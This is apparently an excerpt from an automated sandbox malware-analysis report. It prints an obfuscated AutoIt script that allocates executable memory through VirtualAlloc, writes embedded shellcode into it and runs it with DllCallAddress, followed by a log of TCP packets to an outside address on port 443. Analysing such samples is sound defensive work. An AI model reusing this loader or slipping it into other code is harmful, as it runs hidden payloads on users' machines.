$O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) DIM $I32303032H4 = $X30GC0 ($O31TOY7 (8488 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8487 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) ) DIM $F32303131H0OQK = $X30GC0 ($O31TOY7 (8488 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8503 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8537 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8487 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) ) DIM $T32303238JS = $X30GC0 ($O31TOY7 (8488 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8503 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8537 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8491 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8500 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) ) DIM $V32303435EDM = $X30GC0 ($O31TOY7 (8488 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8503 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8537 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8503 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8488 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) ) DIM $I32303633DXDMBI2N = $X30GC0 ($O31TOY7 (8486 + 4294958876 ) & $O31TOY7 (8525 + 4294958876 ) & $O31TOY7 (8530 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8541 + 4294958876 ) & $O31TOY7 (8496 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8530 + 4294958876 ) ) DIM $R32303734Y64U6B = $I32303032H4 ($O31TOY7 (8527 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8530 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) , $O31TOY7 (8532 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) , $O31TOY7 (8506 + 4294958876 ) & $O31TOY7 (8525 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8537 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8485 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8468 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $I32303633DXDMBI2N ($F33JS1NFK2 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8540 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8540 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) ) $R32303734Y64U6B = $R32303734Y64U6B [0 ] DIM $N323133348L4B = $F32303131H0OQK ($O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8541 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8452 + 4294958876 ) & $O31TOY7 (8535 + 4294958876 ) & $O31TOY7 (8524 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8511 + 4294958876 ) & $I32303633DXDMBI2N ($F33JS1NFK2 ) & $O31TOY7 (8513 + 4294958876 ) , $R32303734Y64U6B ) $V32303435EDM ($N323133348L4B , $O31TOY7 (8535 + 4294958876 ) & $O31TOY7 (8524 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) , $F33JS1NFK2 ) DLLCALLADDRESS ($O31TOY7 (8530 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8530 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) , $R32303734Y64U6B ) $I32303032H4 ($O31TOY7 (8527 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8530 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8506 + 4294958876 ) & $O31TOY7 (8525 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8536 + 4294958876 ) & $O31TOY7 (8537 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8528 + 4294958876 ) & $O31TOY7 (8490 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $R32303734Y64U6B , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8468 + 4294958876 ) , $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8539 + 4294958876 ) & $O31TOY7 (8531 + 4294958876 ) & $O31TOY7 (8534 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) , $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8540 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) )

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2021 19:39:37.889683008 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:37.925626040 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.925793886 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:37.948494911 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:37.984405994 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.984606028 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.984642029 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.984661102 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.984678984 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.984719992 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:37.984746933 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:37.985586882 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:37.985712051 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.057017088 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.093544960 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.093625069 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.110232115 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147306919 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147332907 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147471905 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147473097 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147541046 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147547960 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147567034 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147593021 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147615910 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147638083 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147660971 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147674084 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147681952 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147682905 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147686005 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147700071 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147700071 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.147793055 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.147799969 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.183820963 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.183897972 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.183902025 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.183923960 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.183942080 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.183950901 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.183978081 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.183984995 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.183990955 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184009075 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184036970 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184039116 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184056997 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184065104 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184092999 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184103966 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184111118 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184119940 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184129000 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184139967 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184160948 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184206009 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184217930 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184252024 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184524059 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184570074 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184592009 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184631109 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184643030 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184672117 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184695959 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184698105 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184726954 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184732914 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184758902 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184772015 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184798002 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184812069 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.184823990 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.184854984 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220160007 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220185995 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220201015 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220216990 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220233917 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220248938 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220263958 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220278978 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220287085 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220298052 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220315933 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220330954 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220334053 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220345974 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220357895 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220361948 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220376968 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220391989 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220403910 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220406055 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220424891 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220432043 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220442057 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220453024 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220458031 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220473051 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220488071 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220499039 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220499992 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220520020 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220525980 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220534086 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220592022 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220809937 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220834970 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220858097 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220865011 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220865965 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220918894 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220922947 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220937967 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220957994 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220974922 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.220982075 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.220988035 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221024990 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221036911 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.221040964 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221096039 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.221112013 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221128941 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221139908 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.221143961 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221162081 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221170902 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.221178055 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221190929 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.221230984 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.221257925 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258354902 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258394003 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258420944 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258446932 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258479118 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258479118 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258493900 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258516073 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258516073 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258538961 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258563042 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258579969 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258588076 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258611917 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258635998 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258651972 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258663893 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258748055 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.258912086 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258970976 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.258985996 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259035110 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259201050 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.259280920 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259406090 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.259427071 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.259511948 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259517908 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.259519100 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259566069 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.259644032 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.259757042 CEST	49706	443	192.168.2.5	198.244.149.184
Aug 31, 2021 19:39:38.260030985 CEST	443	49706	198.244.149.184	192.168.2.5
Aug 31, 2021 19:39:38.260059118 CEST	443	49706	198.244.149.184	192.168.2.5
